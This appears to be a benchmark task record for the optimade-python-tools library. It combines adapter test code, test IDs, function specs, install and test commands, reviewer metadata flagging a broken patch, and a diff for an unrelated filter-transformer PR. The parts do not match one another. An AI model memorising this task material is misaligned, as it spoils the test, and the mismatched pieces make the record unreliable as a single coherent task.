(scale.T @ cartesian_positions.T).T + for i in range(3): + scaled_fractional_positions[:, i] %= 1.0 + scaled_fractional_positions[:, i] %= 1.0 + scaled_fractional_positions = [ + tuple(position) for 
position in scaled_fractional_positions + ] + + calculated_fractional_positions = fractional_coordinates( + cell=structure.lattice_vectors, + cartesian_positions=structure.cartesian_site_positions, + ) + + for scaled_position, calculated_position in zip( + scaled_fractional_positions, calculated_fractional_positions + ): + assert scaled_position == pytest.approx(calculated_position) + + +def test_scaled_cell_consistency(structure): + """Test scaled_cell's PDB-designated validation: inverse of det(SCALE) = Volume of cell""" + # Manual calculation of volume = |a_1 . (a_2 x a_3)| + a_1 = structure.lattice_vectors[0] + a_2 = structure.lattice_vectors[1] + a_3 = structure.lattice_vectors[2] + a_mid_0 = a_2[1] * a_3[2] - a_2[2] * a_3[1] + a_mid_1 = a_2[2] * a_3[0] - a_2[0] * a_3[2] + a_mid_2 = a_2[0] * a_3[1] - a_2[1] * a_3[0] + volume_from_cellpar = abs(a_1[0] * a_mid_0 + a_1[1] * a_mid_1 + a_1[2] * a_mid_2) + + scale = scaled_cell(structure.lattice_vectors) + volume_from_scale = 1 / numpy.linalg.det(scale) + + assert volume_from_scale == pytest.approx(volume_from_cellpar) diff --git a/tests/adapters/structures/utils.py b/tests/adapters/structures/utils.py new file mode 100644 index 00000000..fb889a6d --- /dev/null +++ b/tests/adapters/structures/utils.py @@ -0,0 +1,14 @@ +from pathlib import Path +import re + + +def get_min_ver(dependency: str) -> str: + """Retrieve version of `dependency` from setup.py, raise if not found.""" + setup_py = Path(__file__).parent.joinpath("../../../setup.py") + with open(setup_py, "r") as setup_file: + for line in setup_file.readlines(): + min_ver = re.findall(fr'"{dependency}~=([0-9]+(\.[0-9]+){{,2}})"', line) + if min_ver: + return min_ver[0][0] + else: + raise RuntimeError(f"Cannot find {dependency} dependency in setup.py")
[ "tests/adapters/references/test_references.py::TestReference::test_instantiate", "tests/adapters/references/test_references.py::TestReference::test_setting_entry", "tests/adapters/references/test_references.py::TestReference::test_convert_wrong_format", "tests/adapters/references/test_references.py::TestReference::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_instantiate", "tests/adapters/structures/test_structures.py::TestStructure::test_setting_entry", "tests/adapters/structures/test_structures.py::TestStructure::test_convert", "tests/adapters/structures/test_structures.py::TestStructure::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::TestStructure::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_no_module_conversion", "tests/adapters/structures/test_structures.py::TestStructure::test_common_converters" ]
[]
Function: EntryAdapter.__init__(self, entry: dict) Location: optimade.adapters.base.EntryAdapter Inputs: `entry` – a dictionary representing a raw OPTIMADE JSON entry. Outputs: Initializes the adapter instance, setting internal `_entry` to `None`, `_converted` to `{}`, and populates `_common_converters` for `"json"` and `"dict"` serialization. No return value. Description: Constructs an EntryAdapter (or subclass) for lazy conversion of a raw OPTIMADE entry. Called by `Reference(entry)` and `Structure(entry)` in tests. Method: EntryAdapter.entry (property getter) Location: optimade.adapters.base.EntryAdapter Inputs: None. Outputs: Returns the internally stored `EntryResource` instance (e.g., `ReferenceResource` or `StructureResource`). Description: Provides access to the parsed OPTIMADE model object after it has been set via the setter. Used in tests to verify `new_Reference.entry` and `new_Structure.entry`. Method: EntryAdapter.entry (property setter) Location: optimade.adapters.base.EntryAdapter Inputs: `value` – a dictionary representing a raw OPTIMADE entry. Outputs: Sets `_entry` to an `ENTRY_RESOURCE` instance on first call; on subsequent calls prints the warning `"entry can only be set once and is already set."` and leaves the original entry unchanged. No return value. Description: Ensures the underlying OPTIMADE model is assigned only once. Tested via `structure.entry = RAW_STRUCTURES[1]` and `reference.entry = RAW_REFERENCES[1]`. Function: EntryAdapter.convert(self, format: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: - `format` – string key identifying the desired conversion (e.g., `"cif"`, `"json"`). Outputs: Returns the converted representation, either from `_type_converters` (custom converters) or `_common_converters` (JSON string or dict). Caches result in `_converted`. Description: Central conversion dispatcher used in tests like `reference.convert(chosen_type)` and `structure.convert(chosen_type)`. 
Raises `AttributeError` for unknown formats. Static Method: EntryAdapter._get_model_attributes(starting_instances: Union[Tuple[BaseModel], List[BaseModel]], name: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: - `starting_instances` – a tuple or list of Pydantic model instances to search. - `name` – dot‑separated attribute path (e.g., `"attributes.species"`). Outputs: The resolved attribute value or raises `AttributeError` if not found. Description: Helper used by `__getattr__` to retrieve nested OPTIMADE model attributes. Method: EntryAdapter.__getattr__(self, name: str) -> Any Location: optimade.adapters.base.EntryAdapter Inputs: `name` – attribute name accessed on the adapter instance. Outputs: - If `name` starts with `"as_"`, returns `self.convert(entry_type)`. - If `name` matches a valid OPTIMADE model attribute (including nested), returns that value. - Otherwise raises `AttributeError` with a helpful message. Description: Provides dynamic attribute access for both conversion shortcuts (`as_cif`, `as_json`) and direct OPTIMADE fields (`id`, `attributes.species`). Tested extensively in `test_getattr_order` for both `Reference` and `Structure`. Class: Reference (subclass of EntryAdapter) Location: optimade.adapters.references.Reference Inputs: Inherits `EntryAdapter.__init__`; expects a reference entry dict. Outputs: Provides all `EntryAdapter` behavior with `ENTRY_RESOURCE = ReferenceResource`. Description: Lazy reference adapter used in reference tests (`optimade.adapters.Reference`). No additional public methods beyond those inherited. Class: Structure (subclass of EntryAdapter) Location: optimade.adapters.structures.Structure Inputs: Inherits `EntryAdapter.__init__`; expects a structure entry dict. Outputs: Provides all `EntryAdapter` behavior with `ENTRY_RESOURCE = StructureResource` and a populated `_type_converters` mapping. Description: Lazy structure adapter used throughout structure tests. 
Exposes conversion functions for `"aiida_structuredata"`, `"ase"`, `"cif"`, `"pdb"`, `"pdbx_mmcif"`, and `"pymatgen"`. Function: get_aiida_structure_data(optimade_structure: OptimadeStructure) -> StructureData Location: optimade.adapters.structures.aiida.get_aiida_structure_data Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: An `aiida.orm.StructureData` object representing the structure (or `None` with a warning if AiiDA is unavailable). Description: Converts an OPTIMADE structure into AiiDA’s `StructureData`. Tested in `tests/adapters/structures/test_aiida.py` for successful conversion, handling of null positions, null lattice vectors, and special species (vacancies, “X”). Function: get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms Location: optimade.adapters.structures.ase.get_ase_atoms Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: An `ase.Atoms` object representing the structure (or `None` with a warning if ASE is unavailable). May raise `ConversionError` if the structure contains disorder. Description: Converts an OPTIMADE structure to an ASE `Atoms`. Tested in `tests/adapters/structures/test_ase.py`, including error handling for partial occupancies. Function: get_cif(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.cif.get_cif Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: A string containing a CIF representation of the structure (or `None` with a warning if NumPy is unavailable). Description: Generates a CIF file from an OPTIMADE structure, handling lattice parameters, occupancy, and optional fractional coordinates. Tested in `tests/adapters/structures/test_cif.py`. Function: get_pdb(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.proteindatabank.get_pdb Inputs: - `optimade_structure` – an instance of `StructureResource`. 
Outputs: A string containing the structure in the legacy PDB format (or `None` with a warning if NumPy is unavailable). Description: Produces a PDB file from an OPTIMADE structure, applying rotation/scaling as needed. Tested in `tests/adapters/structures/test_pdb.py`. Function: get_pdbx_mmcif(optimade_structure: OptimadeStructure) -> str Location: optimade.adapters.structures.proteindatabank.get_pdbx_mmcif Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: A string containing the structure in the PDBx/mmCIF format (or `None` with a warning if NumPy is unavailable). (Covered but not exercised in coverage; included for completeness.) Description: Generates a PDBx/mmCIF representation, analogous to `get_pdb`. Tested in `tests/adapters/structures/test_pdbx_mmcif.py`. Function: get_pymatgen(optimade_structure: OptimadeStructure) -> Union[Structure, Molecule] Location: optimade.adapters.structures.pymatgen.get_pymatgen Inputs: - `optimade_structure` – an instance of `StructureResource`. Outputs: Either a `pymatgen.core.structure.Structure` (for 3‑D periodic structures) or a `pymatgen.core.structure.Molecule` (for lower‑dimensional or null‑lattice cases), or `None` with a warning if pymatgen is unavailable. Description: Converts OPTIMADE structures to pymatgen objects. Tested in `tests/adapters/structures/test_pymatgen.py` for normal structures, null lattice vectors (yielding a `Molecule`), null positions, and special species handling. Function: pad_positions(positions: List[Vector3D], padding: float=None) -> Tuple[List[Vector3D], bool] Location: optimade.adapters.structures.utils.pad_positions Inputs: - `positions` – list of 3‑element vectors possibly containing `None`. - `padding` – optional float to replace `None`; default converts to `float('nan')`. Outputs: A tuple `(new_positions, padded)` where `new_positions` has `None` replaced by the padding value and `padded` is a boolean indicating whether any replacement occurred. 
Description: Normalizes site position lists for conversion functions. Tested in `tests/adapters/structures/test_utils.py`. Function: pad_cell(lattice_vectors: Tuple[Vector3D, Vector3D, Vector3D], padding: float=None) -> Tuple[Tuple[Vector3D, Vector3D, Vector3D], bool] Location: optimade.adapters.structures.utils.pad_cell Inputs: - `lattice_vectors` – three lattice vectors, each possibly containing `None`. - `padding` – optional float; defaults to `float('nan')`. Outputs: A tuple `(new_cell, padded)` with `None` replaced and a flag indicating padding was applied. Description: Ensures lattice vectors contain numeric values for downstream calculations. Tested in `test_pad_cell`. Function: scaled_cell(cell: Tuple[Vector3D, Vector3D, Vector3D]) -> Tuple[Vector3D, Vector3D, Vector3D] Location: optimade.adapters.structures.utils.scaled_cell Inputs: - `cell` – a 3×3 array of lattice vectors. Outputs: A 3×3 tuple representing the SCALE matrix as defined by the PDB format. Description: Used in PDB conversion and validated against fractional coordinate calculations in `test_scaled_cell_and_fractional_coordinates`. Function: fractional_coordinates(cell: Tuple[Vector3D, Vector3D, Vector3D], cartesian_positions: List[Vector3D]) -> List[Vector3D] Location: optimade.adapters.structures.utils.fractional_coordinates Inputs: - `cell` – lattice vectors. - `cartesian_positions` – Cartesian site positions. Outputs: List of fractional coordinates wrapped into the [0, 1) interval. Description: Provides fractional coordinates for CIF/PDB output and is cross‑validated with `scaled_cell` in tests. Function: cell_to_cellpar(cell, radians: bool=False) -> np.ndarray Location: optimade.adapters.structures.utils.cell_to_cellpar Inputs: - `cell` – 3×3 lattice vectors. - `radians` – if `True`, returns angles in radians; otherwise degrees. Outputs: NumPy array `[a, b, c, alpha, beta, gamma]`. Description: Converts lattice vectors to conventional cell parameters for CIF and PDB generation. 
Used indirectly in `get_cif` and `get_pdbx_mmcif`; exercised in utility tests.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/references/conftest.py tests/adapters/references/test_references.py tests/adapters/structures/conftest.py tests/adapters/structures/test_aiida.py tests/adapters/structures/test_ase.py tests/adapters/structures/test_cif.py tests/adapters/structures/test_pdb.py tests/adapters/structures/test_pdbx_mmcif.py tests/adapters/structures/test_pymatgen.py tests/adapters/structures/test_structures.py tests/adapters/structures/test_utils.py tests/adapters/structures/utils.py" }
{ "num_modified_files": 19, "num_modified_lines": 1185, "pr_author": "CasperWA", "pr_labels": [ "enhancement: New feature or request", "priority/low: Issue or PR with a consensus of low priority" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue aims to add a full adapters system with conversion functions and tests. The test suite aligns with the described adapter behavior, but the provided code has a critical bug in `optimade/adapters/__init__.py`: it constructs `__all__` using undefined module names (`exceptions`, `references`, `structures`), causing an import error and preventing the tests from running. This is a patch artifact that breaks the environment, matching B5 (PATCH_ARTIFACTS).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
36af320b6070c5c96abc8c1ed67b19ff654e16db
2020-06-02 16:48:25
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=h1) Report > Merging [#287](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/d29f7a1c1e89d69aaeffee87e2e46093814c4d3c&el=desc) will **increase** coverage by `0.14%`. > The diff coverage is `98.66%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #287 +/- ## ========================================== + Coverage 90.05% 90.20% +0.14% ========================================== Files 54 56 +2 Lines 2273 2307 +34 ========================================== + Hits 2047 2081 +34 Misses 226 226 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `90.20% <98.66%> (+0.14%)` | :arrow_up: | | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/filtertransformers/base\_transformer.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2Jhc2VfdHJhbnNmb3JtZXIucHk=) | `98.18% <98.18%> (ø)` | | | [optimade/filtertransformers/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL19faW5pdF9fLnB5) | `100.00% <100.00%> (ø)` | | | [optimade/filtertransformers/django.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2RqYW5nby5weQ==) | `91.37% <100.00%> (ø)` | | | 
[optimade/filtertransformers/elasticsearch.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL2VsYXN0aWNzZWFyY2gucHk=) | `87.89% <100.00%> (+0.15%)` | :arrow_up: | | [optimade/filtertransformers/mongo.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL21vbmdvLnB5) | `97.12% <100.00%> (+0.09%)` | :arrow_up: | | [optimade/server/mappers/entries.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL21hcHBlcnMvZW50cmllcy5weQ==) | `98.24% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=footer). Last update [d29f7a1...59d693e](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/287?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). fekad: The `TransformerSkeleton` can be removed for sure. That was just a template for the "developers" and used for debugging.
materials-consortia__optimade-python-tools-287
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ad42c154..d65a1f3b 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -4,22 +4,22 @@ The [Materials Consortia](https://github.com/Materials-Consortia) is very open t This may be anything from simple feedback and raising [new issues](https://github.com/Materials-Consortia/optimade-python-tools/issues/new) to creating [new PRs](https://github.com/Materials-Consortia/optimade-python-tools/compare). -We have below recommendations for setting up an environment in which one may develop the package further. +Recommendations for setting up a development environment can be found in the [Installation instructions](https://www.optimade.org/optimade-python-tools/install/#full-development-installation). ## Getting Started with Filter Parsing and Transforming Example use: ```python -from optimade.filterparser import Parser +from optimade.filterparser import LarkParser -p = Parser(version=(0,9,7)) +p = LarkParser(version=(1, 0, 0)) tree = p.parse("nelements<3") print(tree) ``` ```shell -Tree(start, [Tree(expression, [Tree(term, [Tree(atom, [Tree(comparison, [Token(VALUE, 'nelements'), Token(OPERATOR, '<'), Token(VALUE, '3')])])])])]) +Tree('filter', [Tree('expression', [Tree('expression_clause', [Tree('expression_phrase', [Tree('comparison', [Tree('property_first_comparison', [Tree('property', [Token('IDENTIFIER', 'nelements')]), Tree('value_op_rhs', [Token('OPERATOR', '<'), Tree('value', [Tree('number', [Token('SIGNED_INT', '3')])])])])])])])])]) ``` ```python @@ -27,14 +27,17 @@ print(tree.pretty()) ``` ```shell -start +filter expression - term - atom + expression_clause + expression_phrase comparison - nelements - < - 3 + property_first_comparison + property nelements + value_op_rhs + < + value + number 3 ``` ```python @@ -43,36 +46,31 @@ print(tree.pretty()) ``` ```shell -start +filter expression - term - term - atom - comparison - _mp_bandgap - > - 5.0 - AND - atom + expression_clause + expression_phrase comparison - 
_cod_molecular_weight - < - 350 -``` - -```python -# Assumes graphviz installed on system (e.g. `conda install -c anaconda graphviz`) and `pip install pydot` -from lark.tree import pydot__tree_to_png - -pydot__tree_to_png(tree, "exampletree.png") + property_first_comparison + property _mp_bandgap + value_op_rhs + > + value + number 5.0 + expression_phrase + comparison + property_first_comparison + property _cod_molecular_weight + value_op_rhs + < + value + number 350 ``` -![example tree](images/exampletree.png) - ### Flow for Parsing User-Supplied Filter and Converting to Backend Query -`optimade.filterparser.Parser` will take user input to generate a `lark.Tree` and feed that to a `lark.Transformer`. -E.g., `optimade.filtertransformers.mongo.MongoTransformer` will turn the tree into something useful for your MondoDB backend: +`optimade.filterparser.LarkParser` will take user input to generate a `lark.Tree` and feed that to a `lark.Transformer`. +E.g., `optimade.filtertransformers.mongo.MongoTransformer` will turn the tree into something useful for your MongoDB backend: ```python # Example: Converting to MongoDB Query Syntax @@ -85,55 +83,23 @@ query = transformer.transform(tree) print(query) ``` -```python -{'$and': [{'_mp_bandgap': {'$gt': 5.0}}, {'_cod_molecular_weight': {'$lt': 350.0}}]} +```json +{ + "$and": [ + {"_mp_bandgap": {"$gt": 5.0}}, + {"_cod_molecular_weight": {"$lt": 350.0}} + ] +} ``` -There is also a [basic JSON transformer][optimade.filtertransformers.json] you can use as a simple example for developing your own transformer. -You can also use the JSON output it produces as an easy-to-parse input for a "transformer" in your programming language of choice. 
- -```python -class JSONTransformer(Transformer): - def __init__(self, compact=False): - self.compact = compact - super().__init__() - - def __default__(self, data, children): - items = [] - for c in children: - if isinstance(c, Token): - token_repr = { - "@module": "lark.lexer", - "@class": "Token", - "type_": c.type, - "value": c.value, - } - if self.compact: - del token_repr["@module"] - del token_repr["@class"] - items.append(token_repr) - elif isinstance(c, dict): - items.append(c) - else: - raise ValueError(f"Unknown type {type(c)} for tree child {c}") - tree_repr = { - "@module": "lark", - "@class": "Tree", - "data": data, - "children": items, - } - if self.compact: - del tree_repr["@module"] - del tree_repr["@class"] - return tree_repr -``` ### Developing New Filter Transformers -If you would like to add a new transformer, please add: +If you would like to add a new transformer, please raise an issue to signal your intent (in case someone else is already working on this). +Adding a transformer requires the following: -1. A module (.py file) in the `optimade/filtertransformers` folder. -2. Any additional Python requirements must be optional and provided as a separate "`extra_requires`" entry in `setup.py`. +1. A new submodule (`.py` file) in the `optimade/filtertransformers` folder containing an implementation of the transformer object, preferably one that extends `optimade.filtertransformers.base_transformer.BaseTransformer`. +2. Any additional Python requirements must be optional and provided as a separate "`extra_requires`" entry in `setup.py` and in the `requirements.txt` file. 3. Tests in `optimade/filtertransformers/tests` that are skipped if the required packages fail to import. For examples, please check out existing filter transformers. 
diff --git a/docs/api_reference/filtertransformers/debug.md b/docs/api_reference/filtertransformers/debug.md deleted file mode 100644 index 99ff427d..00000000 --- a/docs/api_reference/filtertransformers/debug.md +++ /dev/null @@ -1,3 +0,0 @@ -# debug - -::: optimade.filtertransformers.debug diff --git a/docs/api_reference/filtertransformers/json.md b/docs/api_reference/filtertransformers/json.md deleted file mode 100644 index 41370588..00000000 --- a/docs/api_reference/filtertransformers/json.md +++ /dev/null @@ -1,3 +0,0 @@ -# json - -::: optimade.filtertransformers.json diff --git a/optimade/filtertransformers/__init__.py b/optimade/filtertransformers/__init__.py index e69de29b..6526f52d 100644 --- a/optimade/filtertransformers/__init__.py +++ b/optimade/filtertransformers/__init__.py @@ -0,0 +1,5 @@ +""" This module implements filter transformer classes for different backends. These +classes typically parse the filter with Lark and produce an appropriate query for the +given backend. + +""" diff --git a/optimade/filtertransformers/base_transformer.py b/optimade/filtertransformers/base_transformer.py new file mode 100644 index 00000000..7f1120ae --- /dev/null +++ b/optimade/filtertransformers/base_transformer.py @@ -0,0 +1,179 @@ +import abc +from lark import Transformer, v_args +from typing import Dict +from optimade.server.mappers import BaseResourceMapper + +__all__ = ("BaseTransformer",) + + +class BaseTransformer(abc.ABC, Transformer): + """Generic filter transformer that handles various + parts of the grammar in a backend non-specific way. + + """ + + # map from standard comparison operators to the backend-specific version + operator_map: Dict[str, str] = { + "<": None, + "<=": None, + ">": None, + ">=": None, + "!=": None, + "=": None, + } + + # map from back-end specific operators to their inverse + # e.g. {"$lt": "$gt"} for MongoDB. 
+ reversed_operator_map: Dict[str, str] = {} + + def __init__(self, mapper: BaseResourceMapper = None): + """Initialise the transformer object, optionally loading in a + resource mapper for use when post-processing. + + """ + self.mapper = mapper + + def postprocess(self, query): + """Post-process the query according to the rules defined for + the backend. + + """ + return query + + def transform(self, tree): + """ Transform the query using the Lark transformer then post-process. """ + return self.postprocess(super().transform(tree)) + + def __default__(self, data, children, meta): + raise NotImplementedError( + f"Calling __default__, i.e., unknown grammar concept. data: {data}, children: {children}, meta: {meta}" + ) + + def filter(self, arg): + """ filter: expression* """ + return arg[0] if arg else None + + @v_args(inline=True) + def constant(self, value): + """ constant: string | number """ + # Note: Return as is. + return value + + @v_args(inline=True) + def value(self, value): + """ value: string | number | property """ + # Note: Return as is. + return value + + @v_args(inline=True) + def non_string_value(self, value): + """ non_string_value: number | property """ + # Note: Return as is. + return value + + @v_args(inline=True) + def not_implemented_string(self, value): + """not_implemented_string: value + + Raises: + NotImplementedError: For further information, see Materials-Consortia/OPTIMADE issue 157: + https://github.com/Materials-Consortia/OPTIMADE/issues/157 + + """ + raise NotImplementedError("Comparing strings is not yet implemented.") + + def property(self, arg): + """ property: IDENTIFIER ( "." 
IDENTIFIER )* """ + return ".".join(arg) + + @v_args(inline=True) + def string(self, string): + """ string: ESCAPED_STRING """ + return string.strip('"') + + @v_args(inline=True) + def signed_int(self, number): + """ signed_int : SIGNED_INT """ + return int(number) + + @v_args(inline=True) + def number(self, number): + """ number: SIGNED_INT | SIGNED_FLOAT """ + if number.type == "SIGNED_INT": + type_ = int + elif number.type == "SIGNED_FLOAT": + type_ = float + return type_(number) + + @v_args(inline=True) + def comparison(self, value): + """ comparison: constant_first_comparison | property_first_comparison """ + # Note: Return as is. + return value + + @abc.abstractmethod + def value_list(self, arg): + """ value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* """ + + @abc.abstractmethod + def value_zip(self, arg): + """ value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* """ + + @abc.abstractmethod + def value_zip_list(self, arg): + """ value_zip_list: value_zip ( "," value_zip )* """ + + @abc.abstractmethod + def expression(self, arg): + """ expression: expression_clause ( OR expression_clause ) """ + + @abc.abstractmethod + def expression_clause(self, arg): + """ expression_clause: expression_phrase ( AND expression_phrase )* """ + + @abc.abstractmethod + def expression_phrase(self, arg): + """ expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) """ + + @abc.abstractmethod + def property_first_comparison(self, arg): + """property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | + set_zip_op_rhs | length_op_rhs ) + + """ + + @abc.abstractmethod + def constant_first_comparison(self, arg): + """ constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) """ + + @v_args(inline=True) + @abc.abstractmethod + def value_op_rhs(self, operator, value): + """ value_op_rhs: OPERATOR value """ + + @abc.abstractmethod + def known_op_rhs(self, arg): + """ 
known_op_rhs: IS ( KNOWN | UNKNOWN ) """ + + @abc.abstractmethod + def fuzzy_string_op_rhs(self, arg): + """ fuzzy_string_op_rhs: CONTAINS value | STARTS [ WITH ] value | ENDS [ WITH ] value """ + + @abc.abstractmethod + def set_op_rhs(self, arg): + """ set_op_rhs: HAS ( [ OPERATOR ] value | ALL value_list | ANY value_list | ONLY value_list ) """ + + @abc.abstractmethod + def length_op_rhs(self, arg): + """ length_op_rhs: LENGTH [ OPERATOR ] value """ + + @abc.abstractmethod + def set_zip_op_rhs(self, arg): + """set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | + ANY value_zip_list ) + + """ + + @abc.abstractmethod + def property_zip_addon(self, arg): + """ property_zip_addon: ":" property (":" property)* """ diff --git a/optimade/filtertransformers/debug.py b/optimade/filtertransformers/debug.py deleted file mode 100644 index b67a35aa..00000000 --- a/optimade/filtertransformers/debug.py +++ /dev/null @@ -1,183 +0,0 @@ -from lark import Transformer - - -class DebugTransformer(Transformer): # pragma: no cover - def __init__(self): - super().__init__() - - def __default__(self, data, children, meta): - print("Node: ", data, children) - return data - - -class TransformerSkeleton(Transformer): # pragma: no cover - """Prints out all the nodes and its arguments during the walk-through of the tree.""" - - def __init__(self): - super().__init__() - - def filter(self, arg): - # filter: expression* - print("Node: ", "filter", arg) - return "filter" - - def constant(self, arg): - # constant: string | number - print("Node: ", "constant", arg) - return "constant" - - def value(self, arg): - # value: string | number | property - print("Node: ", "value", arg) - return "value" - - def value_list(self, arg): - # value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* - print("Node: ", "value_list", arg) - return "value_list" - - def value_zip(self, arg): - # value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] 
value)* - print("Node: ", "value_zip", arg) - return "value_zip" - - def value_zip_list(self, arg): - # value_zip_list: value_zip ( "," value_zip )* - print("Node: ", "value_zip_list", arg) - return "value_zip_list" - - def expression(self, arg): - # expression: expression_clause [ OR expression ] - print("Node: ", "expression", arg) - return "expression" - - def expression_clause(self, arg): - # expression_clause: expression_phrase [ AND expression_clause ] - print("Node: ", "expression_clause", arg) - return "expression_clause" - - def expression_phrase(self, arg): - # expression_phrase: [ NOT ] ( comparison | predicate_comparison | "(" expression ")" ) - print("Node: ", "expression_phrase", arg) - return "expression_phrase" - - def comparison(self, arg): - # comparison: constant_first_comparison | property_first_comparison - # Note: Do nothing! - print("Node: ", "comparison", arg) - return "comparison" - - def property_first_comparison(self, arg): - # property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | - # set_zip_op_rhs ) - print("Node: ", "property_first_comparison", arg) - return "property_first_comparison" - - def constant_first_comparison(self, arg): - # constant_first_comparison: constant value_op_rhs - print("Node: ", "constant_first_comparison", arg) - return "constant_first_comparison" - - def predicate_comparison(self, arg): - # predicate_comparison: length_comparison - print("Node: ", "predicate_comparison", arg) - return "predicate_comparison" - - def value_op_rhs(self, arg): - # value_op_rhs: OPERATOR value - print("Node: ", "value_op_rhs", arg) - return "value_op_rhs" - - def known_op_rhs(self, arg): - # known_op_rhs: IS ( KNOWN | UNKNOWN ) - print("Node: ", "known_op_rhs", arg) - return "known_op_rhs" - - def fuzzy_string_op_rhs(self, arg): - # fuzzy_string_op_rhs: CONTAINS string | STARTS [ WITH ] string | ENDS [ WITH ] string - print("Node: ", "fuzzy_string_op_rhs", arg) - return 
